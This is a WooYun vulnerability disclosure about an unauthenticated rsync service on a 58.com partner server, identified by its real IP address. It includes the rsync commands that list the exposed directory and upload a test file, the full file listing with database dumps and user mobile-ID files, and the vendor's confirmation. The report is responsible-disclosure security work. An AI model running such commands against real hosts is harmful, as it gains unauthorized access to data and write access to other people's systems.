当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098831

漏洞标题:58同城某站点未授权访问泄露少量数据库及脚本信息可上传文件

相关厂商:58同城

漏洞作者: 路人甲

提交时间:2015-03-01 11:37

修复时间:2015-04-15 11:38

公开时间:2015-04-15 11:38

漏洞类型:未授权访问/权限绕过

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-01: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-15: 细节向公众公开

简要描述:

58同城某站点未授权访问泄露少量数据库及脚本信息,可上传文件

详细说明:

ip为211.151.140.20,rsync未授权访问,含少量数据库及脚本信息,可任意文件上传,数据库配置为内网环境,无法远程访问

rsync 211.151.140.20::download/
drwxrwxrwx       12288 2015/02/28 18:24:00 .
-rw-r--r--       18841 2012/08/31 16:56:12 5.5.18_flashback.diff
-rw-rw-r--    15586871 2012/12/10 10:19:28 58xiaoqu.txt
-rw-r--r--   101108730 2014/06/11 16:36:47 CentOS-6.5-x86_64-bin-DVD1.iso
-rw-------      137736 2012/03/26 14:37:04 DBD-mysql-4.020.tar.gz
-rw-------      583067 2012/03/26 14:36:50 DBI-1.618.tar.gz
-rw-rw-r--        2784 2012/10/08 09:15:59 Mail.pm
-rw-r--r--       31984 2013/07/05 14:51:32 MySQL-Replication-0.0.2.tar.gz
-rw-rw-r--       70305 2013/03/06 13:34:25 MySQL-python-1.2.3.tar.gz
-rw-r--r--    10347662 2014/06/09 15:09:58 Percona-Server-5.5.18-rel23.0.tar
-rw-r--r--    12746752 2014/06/10 10:47:05 Percona-Server-5.5.18-rel23.0.tar.gz
-rw-r--r--       50432 2013/04/08 18:10:48 a.binlog
-rw-r--r--     6287577 2012/11/21 18:21:58 a.log
-rw-r--r--         638 2013/05/03 17:45:56 a.pl
-rw-r--r--    42973845 2013/09/03 21:49:09 a.tar.gz
-rw-r--r--       19316 2013/04/26 17:03:25 adv.sql
-rw-r--r--      349207 2013/09/18 19:28:31 advertising_record.sql
-rw-r--r--       20033 2013/06/03 15:09:40 agent_package.sql.gz
-rw-rw----     5378712 2013/06/03 14:52:27 agent_purchase.ibd.gz
-rw-------      163564 2012/09/13 13:39:53 ahiguti-HandlerSocket-Plugin-for-MySQL-1.1.0-2-g395fa55.tar.gz
-rw-r--r-x        4254 2013/03/26 10:19:18 analysis_advert_click.pl
-rw-r--r--         283 2013/05/20 15:24:03 aof_format.pl
-rwxr-xr-x  1004231819 2012/11/20 16:45:10 bj.txt
-rw-r--r--     9832919 2013/04/16 06:10:16 broker.agent_master.sql.gz
-rw-r--r--        1542 2013/04/10 06:15:19 broker.estate-schema.sql.gz
-rw-r--r--   129358395 2013/04/20 06:10:51 broker.estate.sql.gz
-rw-r--r--    51670164 2013/04/23 06:12:21 broker.photo_resale.sql.gz
-rw-r--r--        1971 2013/04/19 06:16:09 broker.resale-schema.sql.gz
-rw-r--r--    17677605 2013/08/26 16:33:05 calpont-infinidb-2.2.11-1.x86_64.bin.tar.gz
-rw-r--r--     5392016 2010/06/29 02:09:55 cmake-2.8.2.tar.gz
-rw-r--r-x      327276 2012/03/19 14:01:59 cpanm
-rw-r--r--        4665 2012/11/19 15:01:46 create_account.c
-rw-rw-r-x        6937 2013/03/19 14:49:56 csaccount.pl
-rw-r--r-x       56921 2012/09/05 15:16:48 dba.pl
-rw-r--r--     8190288 2013/04/23 17:50:08 del_id.log
-rw-rw-rw-   120783883 2013/06/20 16:36:20 del_photo_sql1.txt
-rw-rw-rw-   152205325 2013/06/20 16:36:30 del_photo_sql2.txt
-rw-rw-rw-   246469651 2013/06/20 16:36:40 del_photo_sql3.txt
-rw-r--r--        7441 2013/04/25 11:30:24 enums.sql
-rw-r--r--    11794219 2013/04/23 11:21:11 ershoufang.txt
-rw-r--r--        1562 2013/05/30 12:35:07 estate
-rw-r--r--   156447003 2013/06/04 14:05:25 estate.sql.gz
-rw-r--r--     2358418 2013/06/03 10:30:37 exportidct.zip
-rw-r--r--    75775743 2013/01/22 13:34:17 forum.sql.gz
-rw-r--r--     1617923 2013/06/17 10:52:09 ga.sql
-rw-rw-r--    12011166 2012/11/26 16:15:32 gettext-0.18.tar.gz
-rw-rw-r--        9452 2012/11/26 17:47:08 gitmysql.tar.gz
-rw-rw-r--     1985699 2013/01/29 13:15:54 google-perftools-0.97.tar.gz
-rw-rw-r--     1261243 2013/01/29 11:36:06 gperftools-2.0.tar.gz
-rw-rw-r--      107705 2013/03/26 10:09:25 guangg_20130324.log
-rw-r--r--        5173 2012/06/11 17:08:50 ha.cf
-rw-------        5705 2012/06/14 00:23:26 ha_failover.pl
-rw-------     3502095 2012/06/11 15:59:51 heartbeat-2.0.8.tar.gz
-rw-r--r--       94496 2013/07/01 15:24:43 house_desc_link_word.sql.gz
-rw-rw-rw-     6063912 2012/11/22 15:36:15 housing_estate_info.sql.gz
-rw-------    61601634 2012/05/07 10:35:07 infobright-4.0.6-0-x86_64-ice.rpm
-rw-------     1202970 2012/06/11 15:19:02 libnet-1.1.6.tar.gz
-rw-------      302551 2012/04/25 17:48:13 libpcap-0.8.3.tar.gz
-rw-------      109849 2012/04/25 17:57:59 libpcap-devel-1.2.1-2.fc17.x86_64.rpm
-rw-rw-r--     1028566 2013/01/29 11:37:23 libunwind-1.0.tar.gz
-rw-r--r--      814841 2013/06/03 10:49:40 link.sql
-rw-r--r--       23548 2013/07/01 16:24:37 link.sql.gz
-rw-r--r--        4797 2013/04/18 18:53:58 load_anjuke.pl.bak
-rw-------     1312812 2012/04/17 18:10:02 maatkit-7540.tar.gz
-rwxr-xr-x     5549063 2013/04/08 23:51:20 maria_binlog
-rw-r--r--    31104543 2013/08/27 18:05:23 mariadb-10.0.4.tar.gz
-rw-r--r--   214144862 2012/06/22 10:42:37 mariadb-5.5.25-linux-x86_64.tar.gz
-rw-------       78042 2012/09/19 21:09:35 mha4mysql-manager-0.53-0.noarch.rpm
-rw-rw-r--      105797 2012/07/26 15:15:23 mha4mysql-manager-0.53.tar.gz
-rw-------       33505 2012/09/19 21:09:50 mha4mysql-node-0.53-0.noarch.rpm
-rw-rw-r--       51891 2012/07/26 15:15:58 mha4mysql-node-0.53.tar.gz
-rw-r--r--     6079968 2013/06/18 17:19:00 mongo-python-driver.tar.gz
-rw-r--r--    38527793 2012/05/10 00:36:17 mongodb-linux-x86_64-2.0.5.tgz
-rw-rw-r--    38572579 2012/07/14 11:05:29 mongodb-linux-x86_64-2.0.6.tgz
-rw-r--r--    94389786 2013/04/23 08:10:35 mongodb-linux-x86_64-2.4.3.tgz
-rw-r--r-x        2033 2013/06/17 18:13:23 mongologrotate.py
-rw-r--r--        3968 2012/12/20 14:16:57 my_back.pl
-rw-rw-r--       43382 2012/08/20 10:39:16 mycheckpoint-208.tar.gz
-rw-rw-r--       28050 2012/07/11 13:16:55 mydumper-0.2.3.tar.gz
-rw-r--r--       35098 2011/08/13 00:35:09 mydumper-0.5.1.tar.gz
-rw-r--r--       12626 2013/06/09 11:24:29 myloader.c
-rwxr-xr-x     5042686 2012/06/11 21:50:32 mysql
-rw-r--r--    24341768 2012/03/21 10:29:56 mysql-5.5.21.tar.gz
-rw-rw-r--     1490938 2013/03/18 11:07:06 mysql-5.6.10-linux-glibc2.5-i686.tar.gz
-rw-r--r--    35174149 2013/01/23 16:34:02 mysql-5.6.10.tar.gz
-rw-rw----        4952 2013/08/20 16:37:39 mysql-bin.000001
-rw-rw-r--      512707 2012/10/09 17:40:05 mysql-connector-java-5.0.5-bin.jar
-rw-rw-r-x       32189 2012/11/26 17:55:08 mysql.php
-rwxrwxr-x     9625208 2013/09/18 15:27:03 mysqlbinlog
-rwxr-xr-x     8802679 2013/03/18 21:30:22 mysqlbinlog56
-rw-------       15782 2012/04/25 17:34:20 mysqlsniffer.tgz
-rw-rw-r--       19720 2012/12/28 13:24:01 mytop-1.6.tar.gz
-rw-r--r--     1622291 2013/09/03 23:17:47 nexists_user_mobile_id.txt
-rw-rw-r--      323084 2012/08/07 10:45:43 orzdba_rt_depend_perl_module.tar.gz
-rw-r--r--     7408389 2014/06/09 14:50:37 parallelsDeskTop9.0.24172.951362.dmg
-rw-r--r-x        1732 2012/09/21 10:21:40 parsebinlog.pl
-rw-rw-r--     1539766 2012/07/11 14:40:48 pcre-8.20.tar.gz
-rw-r--r--    50528093 2013/04/12 06:03:49 percona-xtrabackup-2.0.6-523.tar.gz
-rw-r--r--    11204225 2013/04/19 11:29:43 percona-xtrabackup-2.0.6.tar.gz
-rw-r--r--     9092312 2011/01/07 08:31:57 php-5.2.17.tar.bz2
-rw-r--r--    37812529 2013/01/07 14:33:26 pre_forum_post.sql.gz
-rwxr-xr-x      121689 2012/04/04 03:51:38 pt-diskstats
-rwxr-xr-x      337018 2012/11/20 04:21:03 pt-online-schema-change
-rwxrw-rw-         128 2012/09/21 22:20:40 purge_relay_logs.sh
-rw-rw-r--           0 2013/03/06 13:30:45 python-1.2.3c1.tar.gz
-rw-rw-r--     1631858 2012/09/07 16:12:37 q4m-0.9.5.tar.gz
-rw-r--r--        1510 2012/11/16 13:00:37 query.pl
-rw-r--r--       75676 2012/11/29 18:12:46 re.sql.gz
-rw-r--r--    13993733 2013/09/04 10:24:51 recovery.sql
-rw-r--r--      994331 2013/05/17 11:24:18 redis-2.6.13.tar.gz
-rw-r--r--        6653 2013/05/20 10:56:00 semb.log
-rw-rw-r--      250878 2008/02/16 02:13:48 setuptools-0.6c8.tar.gz
-rw-r--r--     3345855 2013/06/08 16:09:27 svid.sql
-rwxr-xr-x   268901084 2012/11/20 16:45:47 sz.txt
-rw-r--r--     1235627 2013/02/28 13:23:09 t_local.sql
-rw-rw-r--        1720 2012/11/26 17:48:18 template_mysql_replication_master.xml
-rw-rw-r--        7887 2012/11/26 17:48:28 template_mysql_replication_slave.xml
-rw-r--r--    38314687 2013/03/12 10:16:27 tf_qa.sql
-rw-r--r--     9090875 2013/02/20 16:11:59 tf_qa.sql.gz
-rw-r--r--     5404186 2013/06/09 10:05:54 ttttt.sql.gz
-rw-r--r--    13071785 2013/04/18 17:27:12 u_estate_mapping.sql
-rw-r--r--    10257478 2013/06/03 11:26:05 u_estate_mapping_new.sql
-rw-r--r--  1379727931 2013/05/17 16:35:49 u_resale_history.tar.bz2
-rw-r--r--     4851989 2013/04/16 16:39:39 union_estate.tar.gz
-rw-rw-r--       69260 2013/04/11 15:30:54 update_alias.sql
-rw-r--r--        7635 2013/03/12 18:25:37 update_estate.pl
-rw-r--r--       65377 2013/04/12 15:34:32 update_estate_city4.sql
-rw-r--r-x        7681 2013/03/12 18:51:50 update_estate_info.pl
-rw-r--r-x        7961 2013/03/12 18:56:00 update_estate_info.pl.tdy
-rw-r--r--       79277 2013/04/22 16:16:03 update_mapping.sql
-rw-r--r--    42971605 2013/09/03 22:23:24 user_mobile_id.txt.gz
-rw-r--r--    16587887 2012/11/09 11:29:16 user_view_statis.sql.gz
-rw-r--r--           0 2015/02/28 18:24:00 wooyun.txt
-rw-------     4605556 2012/04/24 11:25:24 xtrabackup-1.6.4-314.rhel5.x86_64.rpm
-rw-rw-r--     4241782 2012/08/20 22:29:31 zabbix-1.8.15.tar.gz
-rw-rw-r--    12329606 2012/11/26 10:48:41 zabbix-2.0.3.tar.gz
-rw-rw-r--         440 2012/11/26 17:10:26 zabbix.conf.php
-rw-rw-r--        6094 2012/11/26 17:26:46 zabbix_agentd.conf
-rw-rw-r--      273445 2012/11/26 11:34:40 zabbix_agents_2.0.3.linux2_6.amd64.tar.gz
drwxrwxrwt        4096 2011/03/21 14:38:52 .ICE-unix
drwxr-xr-x       16384 2014/07/31 03:12:49 anjuke_daily
drwxr-xr-x        4096 2013/08/16 18:12:52 bin
drwxr-xr-x        4096 2013/06/06 03:10:12 crm_2013-06-06
drwxr-xr-x        4096 2012/04/25 17:52:32 mysqlsniffer
drwxr-xr-x        4096 2013/12/13 14:33:12 test


文件上传:

rsync wooyun.txt 211.151.140.20::download/


58_01.png

漏洞证明:

如上

修复方案:

添加访问权限

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-02 14:13

厂商回复:

此服务器是第三方合作网站,已经联系到他们,目前正在修复处理中。感谢对58安全的关注!

最新状态:

暂无

漏洞评价:

评论